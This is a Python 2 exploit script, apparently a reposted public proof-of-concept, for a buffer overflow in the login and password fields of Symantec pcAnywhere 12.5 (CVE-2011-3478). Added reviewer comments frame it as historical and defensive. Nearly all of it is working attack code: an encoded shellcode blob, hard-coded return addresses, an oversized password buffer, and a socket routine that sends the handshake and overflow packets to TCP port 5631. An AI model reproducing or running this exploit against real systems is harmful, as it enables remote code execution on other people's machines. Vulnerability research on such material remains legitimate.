#!/usr/bin/python
# Exploit Title: Symantec PcAnywhere login and password field buffer overflow
# Date: 2012.06.27
# Author: S2 Crew [Hungary]
# Software Link: symantec.com
# Version: 12.5.0
# Tested on: Windows XP SP2
# CVE: CVE-2011-3478
# Code :
#
# Reviewer notes (defensive context):
#  - Historical proof-of-concept for the CVE named above, kept here for
#    analysis of the affected protocol exchange. Mitigation is the vendor
#    fix for CVE-2011-3478 and not exposing the pcAnywhere service port
#    (TCP 5631, see the connect() call below) to untrusted networks.
#  - Python 2 syntax (`print` statements, `str` payloads); it does not
#    run under Python 3 as written.
#  - The target address is hard-coded; `string` and `sys` are imported
#    but never used.
#  - No socket timeout and no error handling: every recv() below blocks
#    indefinitely if the peer does not answer, and responses are read
#    into `data` but never inspected.
#  - `shell` is an opaque byte blob copied verbatim from the page; what it
#    does is not documented here and is not described in these notes.
import socket
import time
import struct
import string
import sys

# Opaque payload bytes (see reviewer notes above).
shell = (
"\xda\xda\xbb\x9e\x7f\xfb\x04\xd9\x74\x24\xf4\x58\x2b\xc9"
"\xb1\x56\x31\x58\x18\x03\x58\x18\x83\xc0\x9a\x9d\x0e\xf8"
"\x4a\xe8\xf1\x01\x8a\x8b\x78\xe4\xbb\x99\x1f\x6c\xe9\x2d"
"\x6b\x20\x01\xc5\x39\xd1\x92\xab\x95\xd6\x13\x01\xc0\xd9"
"\xa4\xa7\xcc\xb6\x66\xa9\xb0\xc4\xba\x09\x88\x06\xcf\x48"
"\xcd\x7b\x3f\x18\x86\xf0\xed\x8d\xa3\x45\x2d\xaf\x63\xc2"
"\x0d\xd7\x06\x15\xf9\x6d\x08\x46\x51\xf9\x42\x7e\xda\xa5"
"\x72\x7f\x0f\xb6\x4f\x36\x24\x0d\x3b\xc9\xec\x5f\xc4\xfb"
"\xd0\x0c\xfb\x33\xdd\x4d\x3b\xf3\x3d\x38\x37\x07\xc0\x3b"
"\x8c\x75\x1e\xc9\x11\xdd\xd5\x69\xf2\xdf\x3a\xef\x71\xd3"
"\xf7\x7b\xdd\xf0\x06\xaf\x55\x0c\x83\x4e\xba\x84\xd7\x74"
"\x1e\xcc\x8c\x15\x07\xa8\x63\x29\x57\x14\xdc\x8f\x13\xb7"
"\x09\xa9\x79\xd0\xfe\x84\x81\x20\x68\x9e\xf2\x12\x37\x34"
"\x9d\x1e\xb0\x92\x5a\x60\xeb\x63\xf4\x9f\x13\x94\xdc\x5b"
"\x47\xc4\x76\x4d\xe7\x8f\x86\x72\x32\x1f\xd7\xdc\xec\xe0"
"\x87\x9c\x5c\x89\xcd\x12\x83\xa9\xed\xf8\xb2\xed\x23\xd8"
"\x97\x99\x41\xde\x06\x06\xcf\x38\x42\xa6\x99\x93\xfa\x04"
"\xfe\x2b\x9d\x77\xd4\x07\x36\xe0\x60\x4e\x80\x0f\x71\x44"
"\xa3\xbc\xd9\x0f\x37\xaf\xdd\x2e\x48\xfa\x75\x38\x71\x6d"
"\x0f\x54\x30\x0f\x10\x7d\xa2\xac\x83\x1a\x32\xba\xbf\xb4"
"\x65\xeb\x0e\xcd\xe3\x01\x28\x67\x11\xd8\xac\x40\x91\x07"
"\x0d\x4e\x18\xc5\x29\x74\x0a\x13\xb1\x30\x7e\xcb\xe4\xee"
"\x28\xad\x5e\x41\x82\x67\x0c\x0b\x42\xf1\x7e\x8c\x14\xfe"
"\xaa\x7a\xf8\x4f\x03\x3b\x07\x7f\xc3\xcb\x70\x9d\x73\x33"
"\xab\x25\x83\x7e\xf1\x0c\x0c\x27\x60\x0d\x51\xd8\x5f\x52"
"\x6c\x5b\x55\x2b\x8b\x43\x1c\x2e\xd7\xc3\xcd\x42\x48\xa6"
"\xf1\xf1\x69\xe3"
)

# First message of the exchange (original comment: "initial handshake").
init1 = (
"\x00\x00\x00\x00" # initial handshake
)

# Second message; the original comment says the server's "Enter username"
# message (NTdialog) follows it.
init2 = (
"\x0d\x06\xfe" # followed by the "Enter username" message (NTdialog)
)

# Username field: 100 filler bytes (a trailing "\r" is left commented out).
init3 = (
"A" * 100 #+ "\r" #username
)

# Little-endian 32-bit values embedded in the oversized password field.
# The constants are taken verbatim from the page; what they refer to on
# the tested build is not shown here.
readable_xp_sp2 = struct.pack('<L',0x023E5AD0)
call_esi = struct.pack('<L',0x67f7aac4)
jmp = struct.pack('<L',0x414112EB)

# Password field: filler bytes, the packed values above, the opaque payload,
# then trailing "E" padding sized relative to a 4000-byte total.
init4 = (
"B" * 1282
+ jmp
+ readable_xp_sp2
+ "DDDD"
+call_esi
+ "AAAA"
+ shell
+ "E" * (4000 - 1286 - 12 - len(shell))
)

# Plain TCP client; no timeout is set, so every recv() may block forever.
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# socket.connect() returns None, so `connect` is never meaningful.
connect=s.connect(('172.16.29.133',5631)) # hardcoded IP address
print "init packet..."
s.send(init1) # send the data
time.sleep(5)
# Response is read but not checked.
data = s.recv(1024)
print "handshake packet..."
s.send(init2) # send the data
time.sleep(5)
data = s.recv(1024)
print "username packet..."
s.send(init3) # send the data
time.sleep(5)
#data = s.recv(1024)
print "password packet..."
s.send(init4) # send the data
# No response is read after the last send; the socket is simply closed.
s.close()